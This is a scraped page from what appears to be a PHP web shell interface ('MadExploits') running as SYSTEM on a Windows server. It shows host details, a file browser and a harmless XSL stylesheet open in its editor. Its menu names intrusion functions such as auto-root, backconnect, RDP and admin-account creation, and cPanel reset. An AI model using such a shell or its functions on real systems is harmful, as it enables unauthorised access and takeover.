Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
UML /
Output /
[ HOME SHELL ]
Name
Size
Permission
Action
Eclipse
[ DIR ]
drwxrwxrwx
Html
[ DIR ]
drwxrwxrwx
HtmlNew
[ DIR ]
drwxrwxrwx
Php
[ DIR ]
drwxrwxrwx
Xmi
[ DIR ]
drwxrwxrwx
ApiContextPackage.php
1.47
KB
-rw-rw-rw-
ApiRenderer.php
11.04
KB
-rw-rw-rw-
Exporter.php
2.21
KB
-rw-rw-rw-
ExporterAPI.php
4.93
KB
-rw-rw-rw-
ExporterXSL.php
9.94
KB
-rw-rw-rw-
XmiDocument.php
1.98
KB
-rw-rw-rw-
common.xsl
3.48
KB
-rw-rw-rw-
xmi1to2.xsl
14.74
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common.xsl
<?xml version="1.0" encoding="iso-8859-1"?> <xsl:stylesheet version="1.0" exclude-result-prefixes="uml xmi" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:uml="http://schema.omg.org/spec/UML/2.1.2" xmlns:xmi="http://schema.omg.org/spec/XMI/2.1"> <!-- General templates used by the exporting system --> <xsl:key name="getElementById" match="packagedElement" use="@xmi:id"/> <xsl:key name="getRealizations" match="packagedElement[@xmi:type='uml:Realization']" use="@client"/> <xsl:key name="getRealizingClasses" match="packagedElement[@xmi:type='uml:Realization']" use="@supplier"/> <xsl:key name="getMetadata" match="/*[1]/*[name()='php:docblock']" use="@base_Element"/> <xsl:key name="getSubclasses" match="packagedElement" use="generalization/@general"/> <xsl:key name="getManifestation" match="manifestation" use="@supplier"/> <xsl:param name="phpCreateFolder"/> <xsl:param name="phpSaveToFile"/> <xsl:param name="appName" /> <xsl:param name="genDate" /> <!-- Starting templates --> <xsl:template match="/"> <xsl:for-each select="descendant::*"> <xsl:choose> <xsl:when test="name()='uml:Model'"> <xsl:call-template name="top-container"/> </xsl:when> </xsl:choose> </xsl:for-each> </xsl:template> <!-- Each implementation (documentation or code) must provide a "top-container" template --> <xsl:template match="uml:Model"> <xsl:call-template name="top-container"/> </xsl:template> <!-- Library --> <!-- Returns the package part of the context element (eg: PHP.UML) --> <xsl:template name="getPackageNamePart"> <xsl:param name="context" select="."/> <xsl:for-each select="$context/ancestor::packagedElement"> <xsl:value-of select="concat(@name, $packageDelimiter)"/> </xsl:for-each> </xsl:template> <!-- Returns the filepath that leads to the context element, from the top container --> <xsl:template name="getPackageFilePath"> <xsl:param name="context" /> <xsl:for-each select="$context/ancestor::packagedElement"> <xsl:value-of select="concat(@name, '/')"/> </xsl:for-each> </xsl:template> <!-- Same as getPackageNamePart(), without the trailing delimiter --> <xsl:template name="getNestingPackageName"> <xsl:param name="context" /> <xsl:variable name="packageNamePart"> <xsl:call-template name="getPackageNamePart"> <xsl:with-param name="context" select="$context" /> </xsl:call-template> </xsl:variable> <xsl:value-of select="substring($packageNamePart, 1, string-length($packageNamePart)-string-length($packageDelimiter))"/> </xsl:template> <xsl:template name="getPrefix"> <xsl:param name="context" select="."/> <xsl:choose> <xsl:when test="$context/@xmi:type='uml:Interface'"> <xsl:value-of select="$fileprefixInterface"/> </xsl:when> <xsl:when test="$context/@xmi:type='uml:DataType'"> <xsl:value-of select="$fileprefixDatatype"/> </xsl:when> <xsl:otherwise> <xsl:value-of select="$fileprefixClass"/> </xsl:otherwise> </xsl:choose> </xsl:template> <xsl:template name="titleComment"> <xsl:value-of select="substring-before(concat(ownedComment/body/text()|ownedComment/@body, $cr), $cr)"/> </xsl:template> <xsl:template name="toLowerCase"> <xsl:param name="str"/> <xsl:value-of select="translate($str, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz')"/> </xsl:template> <xsl:template name="toUpperCase"> <xsl:param name="str"/> <xsl:value-of select="translate($str, 'abcdefghijklmnopqrstuvwxyz', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ')"/> </xsl:template> </xsl:stylesheet>
Close